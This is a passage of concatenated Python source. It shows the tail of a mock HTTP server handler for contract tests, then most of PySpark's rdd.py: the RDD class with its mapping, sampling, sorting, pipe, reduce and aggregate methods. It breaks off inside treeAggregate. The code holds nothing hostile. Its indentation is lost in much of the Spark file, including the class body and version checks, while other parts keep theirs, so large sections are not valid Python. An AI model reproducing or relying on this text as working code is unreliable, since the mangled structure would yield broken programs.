        self.server.outgoing_results.put({"status": "success"})
    def handle_failure(self, reason):
        # 418 distinguishes a pact mismatch from an internal (500) error.
        self.error_result(reason, status="failed", status_code=418)
    def respond_for_interaction(self, interaction):
        # Mirror the interaction's declared response: status, headers, body.
        self.response_status_code = interaction["response"]["status"]
        if "headers" in interaction["response"]:
            self.response_headers.update(interaction["response"]["headers"])
        if "body" in interaction["response"]:
            self.response_body = self.handle_response_encoding(
                interaction["response"], self.response_headers
            )
    def do_DELETE(self):
        self.run_request("DELETE")
    def do_GET(self):
        self.run_request("GET")
    def do_HEAD(self):
        self.run_request("HEAD")
    def do_POST(self):
        self.run_request("POST")
    def do_PUT(self):
        self.run_request("PUT")
    def do_PATCH(self):
        self.run_request("PATCH")
    def log_message(self, format, *args):
        # Route BaseHTTPRequestHandler's access logging to the per-provider log.
        self.server.log.info("MockServer %s\n" % format % args)
|
rdd.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
    """
    Evaluation type of python rdd.
    These values are internal to PySpark.
    These values should match values in org.apache.spark.api.python.PythonEvalType.
    """
    NON_UDF = 0  # plain RDD evaluation, no UDF involved
    SQL_BATCHED_UDF = 100  # row-at-a-time SQL UDF, evaluated in batches
    SQL_SCALAR_PANDAS_UDF = 200  # vectorized (pandas) scalar UDF
    SQL_GROUPED_MAP_PANDAS_UDF = 201  # vectorized grouped-map (pandas) UDF
def portable_hash(x):
    """
    Return a hash code that is consistent across processes for builtin types,
    especially for None and tuples containing None.
    The tuple algorithm mirrors the one used by CPython 2.7.
    >>> portable_hash(None)
    0
    >>> portable_hash((None, 1)) & 0xffffffff
    219750521
    """
    # String hashing must be deterministic across workers, so hash
    # randomization has to be disabled explicitly.
    if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
        raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
    if x is None:
        return 0
    if not isinstance(x, tuple):
        return hash(x)
    # Tuple: fold element hashes together, CPython-2.7 style.
    acc = 0x345678
    for item in x:
        acc = ((acc ^ portable_hash(item)) * 1000003) & sys.maxsize
    acc ^= len(x)
    if acc == -1:
        acc = -2
    return int(acc)
class BoundedFloat(float):
    """
    A float produced by an approximate job, annotated with its confidence
    level and low/high bounds.
    >>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
    100.0
    """
    def __new__(cls, mean, confidence, low, high):
        # float is immutable, so the value must be set in __new__.
        instance = super(BoundedFloat, cls).__new__(cls, mean)
        instance.confidence = confidence
        instance.low = low
        instance.high = high
        return instance
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
    """Connect back to the JVM and deserialize the streamed result data."""
    stream, sock = local_connect_and_auth(*sock_info)
    # RDD materialization time is unpredictable, so reading must never time
    # out (SPARK-18281). The socket is closed when garbage-collected.
    sock.settimeout(None)
    return serializer.load_stream(stream)
def ignore_unicode_prefix(f):
    """
    Strip the u'' prefix from strings in *f*'s docstring so its doctests pass
    on both Python 2 and Python 3.
    """
    if sys.version >= '3':
        # Python 3 reprs carry no u'' prefix, so drop it from expected output.
        pattern = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
        f.__doc__ = pattern.sub(r'\1\2', f.__doc__)
    return f
class Partitioner(object):
    """Maps a key to a partition index: partitionFunc(k) modulo numPartitions."""

    def __init__(self, numPartitions, partitionFunc):
        self.numPartitions = numPartitions
        self.partitionFunc = partitionFunc

    def __eq__(self, other):
        # Two partitioners are interchangeable when both the partition count
        # and the partitioning function match.
        if not isinstance(other, Partitioner):
            return False
        return (self.numPartitions == other.numPartitions
                and self.partitionFunc == other.partitionFunc)

    def __call__(self, k):
        return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
    """
    Return an RDD created by piping elements to a forked external process.

    >>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
    [u'1', u'2', u'', u'3']

    :param checkCode: whether or not to check the return value of the shell command.
    """
    if env is None:
        env = dict()

    def func(iterator):
        # One child process per partition.  stdin is fed from a background
        # thread so that reading stdout here cannot deadlock on full pipes.
        pipe = Popen(
            shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)

        def pipe_objs(out):
            # Write one element per line (UTF-8), then close stdin so the
            # child sees EOF and can exit.
            for obj in iterator:
                s = str(obj).rstrip('\n') + '\n'
                out.write(s.encode('utf-8'))
            out.close()
        Thread(target=pipe_objs, args=[pipe.stdin]).start()

        def check_return_code():
            # An (empty) generator chained *after* stdout: it only runs once
            # all output is consumed, so the exit status check happens last.
            pipe.wait()
            if checkCode and pipe.returncode:
                raise Exception("Pipe function `%s' exited "
                                "with error code %d" % (command, pipe.returncode))
            else:
                for i in range(0):
                    yield i
        return (x.rstrip(b'\n').decode('utf-8') for x in
                chain(iter(pipe.stdout.readline, b''), check_return_code()))
    return self.mapPartitions(func)
def foreach(self, f):
    """
    Applies a function to all elements of this RDD.

    >>> def f(x): print(x)
    >>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
    """
    f = fail_on_stopiteration(f)

    def applyToPartition(iterator):
        # Run f for its side effects only; yield nothing.
        for element in iterator:
            f(element)
        return iter([])
    self.mapPartitions(applyToPartition).count()  # Force evaluation
def foreachPartition(self, f):
    """
    Applies a function to each partition of this RDD.

    >>> def f(iterator):
    ...     for x in iterator:
    ...         print(x)
    >>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
    """
    def wrapper(iterator):
        result = f(iterator)
        # f may return None (pure side effects) or something iterable;
        # normalize both cases to an iterator.
        try:
            return iter(result)
        except TypeError:
            return iter([])
    self.mapPartitions(wrapper).count()  # Force evaluation
def collect(self):
    """
    Return a list that contains all of the elements in this RDD.

    .. note:: This method should only be used if the resulting array is expected
        to be small, as all the data is loaded into the driver's memory.
    """
    # Run the job on the JVM side, then stream the results back to the
    # driver through a local socket, deserializing with this RDD's serializer.
    with SCCallSiteSync(self.context) as css:
        sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
    return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
    """
    Reduces the elements of this RDD using the specified commutative and
    associative binary operator. Currently reduces partitions locally.

    >>> from operator import add
    >>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
    15
    >>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
    10
    >>> sc.parallelize([]).reduce(add)
    Traceback (most recent call last):
        ...
    ValueError: Can not reduce() empty RDD
    """
    f = fail_on_stopiteration(f)

    def reducePartition(iterator):
        it = iter(iterator)
        # An empty partition contributes nothing.
        try:
            first = next(it)
        except StopIteration:
            return
        yield reduce(f, it, first)

    partials = self.mapPartitions(reducePartition).collect()
    if not partials:
        raise ValueError("Can not reduce() empty RDD")
    return reduce(f, partials)
def treeReduce(self, f, depth=2):
    """
    Reduces the elements of this RDD in a multi-level tree pattern.

    :param depth: suggested depth of the tree (default: 2)

    >>> add = lambda x, y: x + y
    >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
    >>> rdd.treeReduce(add)
    -5
    >>> rdd.treeReduce(add, 1)
    -5
    >>> rdd.treeReduce(add, 2)
    -5
    >>> rdd.treeReduce(add, 5)
    -5
    >>> rdd.treeReduce(add, 10)
    -5
    """
    if depth < 1:
        raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)

    # Pair each element with a "dummy" flag; (None, True) acts as an
    # identity zero value for the combining operator below.
    zeroValue = None, True

    def op(x, y):
        if x[1]:
            return y
        if y[1]:
            return x
        return f(x[0], y[0]), False

    flagged = self.map(lambda element: (element, False))
    reduced = flagged.treeAggregate(zeroValue, op, op, depth)
    if reduced[1]:
        raise ValueError("Cannot reduce empty RDD.")
    return reduced[0]
def fold(self, zeroValue, op):
    """
    Aggregate the elements of each partition, and then the results for all
    the partitions, using a given associative function and a neutral "zero value."

    The function C{op(t1, t2)} is allowed to modify C{t1} and return it
    as its result value to avoid object allocation; however, it should not
    modify C{t2}.

    This behaves somewhat differently from fold operations implemented
    for non-distributed collections in functional languages like Scala.
    This fold operation may be applied to partitions individually, and then
    fold those results into the final result, rather than apply the fold
    to each element sequentially in some defined ordering. For functions
    that are not commutative, the result may differ from that of a fold
    applied to a non-distributed collection.

    >>> from operator import add
    >>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
    15
    """
    op = fail_on_stopiteration(op)

    def foldPartition(iterator):
        accumulator = zeroValue
        for element in iterator:
            accumulator = op(accumulator, element)
        yield accumulator
    # collecting result of mapPartitions here ensures that the copy of
    # zeroValue provided to each partition is unique from the one provided
    # to the final reduce call
    partials = self.mapPartitions(foldPartition).collect()
    return reduce(op, partials, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
    """
    Aggregate the elements of each partition, and then the results for all
    the partitions, using a given combine functions and a neutral "zero
    value."

    The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
    as its result value to avoid object allocation; however, it should not
    modify C{t2}.

    The first function (seqOp) can return a different result type, U, than
    the type of this RDD. Thus, we need one operation for merging a T into
    an U and one operation for merging two U

    >>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
    >>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
    >>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
    (10, 4)
    >>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
    (0, 0)
    """
    seqOp = fail_on_stopiteration(seqOp)
    combOp = fail_on_stopiteration(combOp)

    def aggregatePartition(iterator):
        accumulator = zeroValue
        for element in iterator:
            accumulator = seqOp(accumulator, element)
        yield accumulator
    # collecting result of mapPartitions here ensures that the copy of
    # zeroValue provided to each partition is unique from the one provided
    # to the final reduce call
    partials = self.mapPartitions(aggregatePartition).collect()
    return reduce(combOp, partials, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
    """
    Aggregates the elements of this RDD in a multi-level tree
    pattern.

    :param depth: suggested depth of the tree (default: 2)

    >>> add = lambda x, y: x + y
    >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
    >>> rdd.treeAggregate(0, add, add)
    -5
    >>> rdd.treeAggregate(0, add, add, 1)
    -5
    >>> rdd.treeAggregate(0, add, add, 2)
    -5
    >>> rdd.treeAggregate(0, add, add, 5)
    -5
    >>> rdd.treeAggregate(0, add, add, 10)
    -5
    """
    if depth < 1:
        raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)

    if self.getNumPartitions() == 0:
        return zeroValue

    def aggregatePartition(iterator):
        # Fold each partition with seqOp, starting from zeroValue.
        acc = zeroValue
        for obj in iterator:
            acc = seqOp(acc, obj)
        yield acc

    partiallyAggregated = self.mapPartitions(aggregatePartition)
    numPartitions = partiallyAggregated.getNumPartitions()
    # Fan-in factor per tree level, derived from the requested depth.
    scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
    # If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
    # aggregation.
    while numPartitions > scale + numPartitions / scale:
        numPartitions /= scale
        curNumPartitions = int(numPartitions)

        def mapPartition(i, iterator):
            # Spread the partial results across curNumPartitions reducers.
            for obj in iterator:
                yield (i % curNumPartitions, obj)

        partiallyAggregated = partiallyAggregated \
            .mapPartitionsWithIndex(mapPartition) \
